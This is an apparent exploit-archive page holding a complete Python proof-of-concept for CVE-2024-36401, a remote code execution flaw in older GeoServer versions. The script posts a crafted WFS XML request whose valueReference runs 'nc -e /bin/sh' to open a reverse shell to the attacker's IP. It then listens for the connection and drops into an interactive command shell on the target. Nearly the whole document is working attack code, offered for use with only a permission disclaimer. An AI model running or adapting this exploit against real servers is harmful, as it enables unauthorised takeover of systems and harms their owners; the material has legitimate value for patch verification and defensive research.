4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve-2024-36401.py PY
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
Author: x.com/MohamedNab1l                                                                             
GitHub: https://github.com/bigb0x/CVE-2024-36401

About:
    POC for CVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer. This POC is based on the security advisory by phith0n: https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401

Note:
    This POC will attempt to establish a reverse shell from the vlun targets. This is aimed to work against Linux targets. You will have to have a machine with published and accessiable IP in order to run this poc. This technique assumes that nc is available at the remote target.

Usage:
    python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type

Please feel free to contact me if you have any comments or sugesstions 

Version: 1.0.3

Refrences 
    https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401

Disclaimer:
    I like to create my own tools for fun, work and educational purposes only. I do not support or encourage hacking or unauthorized access to any system or network. Please use my tools responsibly and only on systems where you have clear permission to test.

"""
import requests
import argparse
import re
import os
import threading
import time
import socket
from urllib.parse import urlparse
import select

from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


# ANSI color codes
light_gray_color = '\033[37;1m'
dimmed_gray_color = '\033[90m'
honey_yellow_color = '\033[38;5;214m'
dim_yellow_color = "\033[33;1m"
cyan_color = '\033[96m'
green_color = '\033[92m'
red_color = '\033[31m'
reset_color = '\033[0m'

LOG_DIR = "logs"

# THE_VERSION ="1.0.3"

def banner():
    print(f'''{honey_yellow_color}
┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓┏┓┏┓┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┣┓┃┃┃┫┃
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗┛┗╋┗┛┻
          
-> {light_gray_color}POC for CVE-2024-36401. Will try to obtain a shell on linux targets.{reset_color}
{honey_yellow_color}-> {light_gray_color}By: x.com/mohamednab1l
{honey_yellow_color}-> {honey_yellow_color}Use this wisely.{reset_color}
''')

def print_message(level, message):
    current_time = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
    if level == 'info':
        print(f"{current_time} {green_color}[INFO]{reset_color} {message}")
    elif level == 'warning':
        print(f"{current_time} {honey_yellow_color}[VLUN] {message} {reset_color}")
    elif level == 'error':
        print(f"{current_time} {red_color}[ERROR]{message}{reset_color} ")


def create_log_dir():
    if not os.path.exists(LOG_DIR):
        os.makedirs(LOG_DIR)
        print_message('info', f"Log directory created: {LOG_DIR}")

def clean_host(url):
    parsed_url = urlparse(url)
    host = parsed_url.netloc or parsed_url.path
    host = re.sub(r'^www\.', '', host)
    host = re.sub(r'/$', '', host)
    return host


def send_poc_request(url, host, ip, port, type):
    full_url = f"{url}/geoserver/wfs"
    headers = {
        "Host": host,
        "Accept-Encoding": "gzip, deflate, br",
        "Accept": "*/*",
        "Accept-Language": "en-US;q=0.9,en;q=0.8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36",
        "Connection": "close",
        "Cache-Control": "max-age=0",
        "Content-Type": "application/xml",
    }
    custom_payload = f"""
        <wfs:GetPropertyValue service='WFS' version='2.0.0'
         xmlns:topp='http://www.openplans.org/topp'
         xmlns:fes='http://www.opengis.net/fes/2.0'
         xmlns:wfs='http://www.opengis.net/wfs/2.0'>
          <wfs:Query typeNames='{type}'/>
          <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'nc -e /bin/sh {ip} {port}')</wfs:valueReference>
        </wfs:GetPropertyValue>
    """
    
    try:
        response = requests.post(full_url, headers=headers, data=custom_payload, timeout=30, verify=False)
        print_message('info', f"Response status code: {dim_yellow_color}{response.status_code}{reset_color}")
        if response.status_code in [401, 404, 403]:
            print_message('info', "Target is not vulnerable.")
            exit()
        else:
            print_message('info', "Request sent. Checking for incoming connections.")
    except requests.exceptions.RequestException as e:
        print_message('error', f"An error occurred: {e}")
        print_message('error', "Failed to send request!")

def receive_output(client_socket, timeout=5):
    total_data = []
    client_socket.setblocking(0)
    start_time = time.time()
    while True:
        if total_data and time.time() - start_time > timeout:
            break
        elif time.time() - start_time > timeout * 2:
            break
        try:
            data = client_socket.recv(8192)
            if data:
                total_data.append(data.decode('utf-8', errors='ignore'))
                start_time = time.time()
            else:
                time.sleep(0.1)
        except socket.error:
            pass
    return ''.join(total_data).strip()

def interactive_shell(client_socket):
    print_message('warning', "Nice!, we got a remote shell! :)")
    
    client_socket.send(b"id\n")
    time.sleep(1)
    output = receive_output(client_socket)
    if output:
        print_message('warning', "Checking the output of 'id' command:")
        print(f"{output}")
    else:
        print("No output received from 'id' command.")

    print_message('warning', "Shell established!.")
    print_message('warning', "Type commands and press enter to send, or type 'exit' to end the session.")
    
    while True:
        try:
            command = input(f"{honey_yellow_color}shell> {reset_color}")
            if command.lower() == 'exit':
                break
            
            client_socket.send(command.encode() + b'\n')
            time.sleep(1)
            
            output = receive_output(client_socket)
            if output:
                print(output)
            else:
                print_message('warning', "No output received.")
        
        except Exception as e:
            print_message('error', f"Error in shell: {e}")
            break
    
    client_socket.close()
    print_message('info', "Shell connection closed.")
    exit()

def listen(ip, port, stop_event):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((ip, port))
    s.settimeout(1)
    s.listen(1)
    print_message('info', f"Listening on {ip}:{port}...")

    try:
        while not stop_event.is_set():
            try:
                client, (client_ip, client_port) = s.accept()
                print_message('info', f"Received connection from: {client_ip}:{client_port}")
                print_message('warning', "POC was successful!")
                
                interactive_shell(client)
            except socket.timeout:
                continue 
    except Exception as e:
        print_message('error', f"An error occurred: {e}")
    finally:
        s.close()
        
def main():
    banner()
    parser = argparse.ArgumentParser(description='POC for CVE-2024-36401')
    parser.add_argument('-u', required=True, help='Target, example https://target:8080')
    parser.add_argument('-ip', required=True, help='Your IP, example 192.168.1.1')
    parser.add_argument('-port', required=True, help='Port, example 1337')
    parser.add_argument('-type', required=True, help='Type, example sf:archsites')
    
    args = parser.parse_args()
    
    url = args.u
    ip = args.ip
    port = int(args.port)
    type = args.type
    host = clean_host(url)

    stop_event = threading.Event()

    def listen_wrapper():
        listen(ip, port, stop_event)

    listen_thread = threading.Thread(target=listen_wrapper)
    listen_thread.daemon = True
    listen_thread.start()

    time.sleep(1)

    try:
        # Send the POST request
        send_poc_request(url, host, ip, port, type)
        
        while listen_thread.is_alive():
            listen_thread.join(1)  
    except KeyboardInterrupt:
        print_message('info', "Keyboard interrupt received. Cleaning up...")
    finally:
        stop_event.set()
        
        # (should be quick now)
        listen_thread.join(timeout=5)
        
        if listen_thread.is_alive():
            print_message('warning', "Listen thread did not stop in time. It will be terminated.")

    print_message('info', "Script execution completed. Exiting...")

if __name__ == "__main__":
    create_log_dir()
    main()